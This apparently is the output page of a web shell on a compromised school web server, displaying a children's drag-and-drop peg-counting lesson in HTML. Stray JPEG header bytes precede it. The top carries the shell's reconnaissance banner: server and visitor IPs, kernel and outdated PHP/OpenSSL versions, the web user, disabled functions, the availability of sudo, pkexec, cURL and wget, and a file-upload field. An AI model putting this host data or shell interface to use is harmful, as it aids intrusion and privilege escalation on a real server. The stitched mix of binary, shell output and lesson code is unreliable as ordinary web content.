????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.216.150.3 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old2/Html/LevelA/Category2/ |
Upload File : |
<!doctype html> <html> <head> <title>Count the pegs on the cloth line and match.</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style> .style_Questions { padding-left: 10px; text-align: left; font-size: 24px; font-family: "Arial Rounded MT Bold"; font-weight: bold; color: #000; } .style_Answers { color: #F00; } .id_tdPeg { border: 1px; text-align:center; } .cls_tdCloths { text-align:center; border-bottom: 0px; } .style_borderNone { border:none; border-collapse:collapse; } </style> <script> function page_preLoad() { setPageImages(); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 12), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); } function page_onLoad() { shared_set_debugInfo(Level.A, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); } function setPageImages() { var imagesPath = "../../../img/LevelA/Category2/LevelACat2Lesson12/"; shared_setImageSource('id_imgCloth', imagesPath, 'Coloth.png'); shared_setImageSource('id_imgSox', imagesPath, 'Sox.png'); shared_setImageSource('id_imgSoxes', imagesPath, 'Soxes.png'); shared_setImageSource('id_imgUnderWare', imagesPath, 'UnderWare.png'); shared_setImageSource('id_imgPeg1', imagesPath, 'Peg1.png'); shared_setImageSource('id_imgPeg2', imagesPath, 'Peg2.png'); shared_setImageSource('id_imgPeg4', imagesPath, 'Peg4.png'); shared_setImageSource('id_imgPeg3', imagesPath, 'Peg3.png'); } function btnPrevious_click() { window.location = "LevelACat2Lesson11.html"; } function btnNext_click() { window.location = "LevelACat2Lesson13.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelA'); } function DragDrop(id_dropBox, id_imgElement) { shared_dragDropImage(shared_currentDropingId, id_dropBox, id_imgElement); isAllInfosMovedShowClapsAnimation(); } function isAllInfosMovedShowClapsAnimation() { var allElementIdsArray = ['id_PimgPeg1', 'id_PimgPeg2', 'id_PimgPeg3', 'id_PimgPeg4']; shared_is_all_infos_moved_show_claps_animation(allElementIdsArray, 'shared_id_div_claps_image'); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <header height="100%"> <div id="id_tblHeader" align="center"></div> </header> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td class="style_borderNone"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" style="border-left: none; border-right: none; border-top: none"> <tr> <td width="100%" class="style_Questions style_borderNone" style="padding-left:10px; border: none"><u>Count the <span class="style_Answers"><u>peg</u></span>s on the cloth line and match</u> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" id="id_WithMansVansTable" border="0" cellspacing="0" cellpadding="5"> <tr height="20%"> <td style="padding-bottom: 0px"> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr> <td class="id_tdPeg" width="25%"> <span id="id_PimgPeg1" class="cls_PimgPeg1" draggable="true" ondragstart="shared_dragStart(event)"> <img id="id_imgPeg1" width="70%" height="60%"> </span> </td> <td class="id_tdPeg" width="25%"> <span id="id_PimgPeg2" class="cls_PimgPeg2" draggable="true" ondragstart="shared_dragStart(event)"> <img id="id_imgPeg2" width="70%" height="60%"> </span> </td> <td class="id_tdPeg" width="25%"> <span id="id_PimgPeg4" class="cls_PimgPeg4" draggable="true" ondragstart="shared_dragStart(event)"> <img id="id_imgPeg4" width="70%" height="60%"> </span> </td> <td class="id_tdPeg" width="*"> <span id="id_PimgPeg3" class="cls_PimgPeg3" draggable="true" ondragstart="shared_dragStart(event)"> <img id="id_imgPeg3" width="70%" height="60%"> </span> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="5" style="border:none"> <tr height="25%"> <td class="cls_tdCloths" width="50%"> <img id="id_imgCloth" height="90%"> </td> <td width="50%" id="id_BoxForPeg4" class="cls_BoxForPeg4" style="text-align:center; border-bottom: none; border-left: none" ondrop="DragDrop" ondragover="shared_allowDrop(event)"> </td> </tr> <tr height="25%"> <td class="cls_tdCloths" width="50%"> <img id="id_imgSox" height="90%"> </td> <td width="50%" id="id_BoxForPeg1" class="cls_BoxForPeg1" style="text-align:center; border-bottom: none; border-left: none" ondrop="DragDrop" ondragover="shared_allowDrop(event)"> </td> </tr> <tr height="25%"> <td width="50%" align="center" style="border-bottom:none"> <img id="id_imgSoxes" height="90%"> </td> <td width="50%" id="id_BoxForPeg3" class="cls_BoxForPeg3" style="text-align:center; border-left: none; border-bottom:none" ondrop="DragDrop" ondragover="shared_allowDrop(event)"> </td> </tr> <tr height="*"> <td width="50%" style="text-align:center"> <img id="id_imgUnderWare" height="90%"> </td> <td width="50%" id="id_BoxForPeg2" class="cls_BoxForPeg2" style="text-align:center; border-left: none" ondrop="DragDrop" ondragover="shared_allowDrop(event)"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="5%"> <td> <footer height="100%"> <div id="id_tblFooter" align="center"></div> </footer> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_PimgPeg1', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_PimgPeg1'}}); new webkit_draggable('id_PimgPeg2', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_PimgPeg2'}}); new webkit_draggable('id_PimgPeg3', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_PimgPeg3'}}); new webkit_draggable('id_PimgPeg4', {revert : true, scroll : false, onStart : function(){shared_currentDropingId = 'id_PimgPeg4'}}); webkit_drop.add('id_BoxForPeg1', {accept:["cls_PimgPeg1"], onDrop : function(){DragDrop('id_BoxForPeg1', 'id_imgPeg1')}}); webkit_drop.add('id_BoxForPeg2', {accept:["cls_PimgPeg2"], onDrop : function(){DragDrop('id_BoxForPeg2', 'id_imgPeg2')}}); webkit_drop.add('id_BoxForPeg3', {accept:["cls_PimgPeg3"], onDrop : function(){DragDrop('id_BoxForPeg3', 'id_imgPeg3')}}); webkit_drop.add('id_BoxForPeg4', {accept:["cls_PimgPeg4"], onDrop : function(){DragDrop('id_BoxForPeg4', 'id_imgPeg4')}}); </script> </body> </html>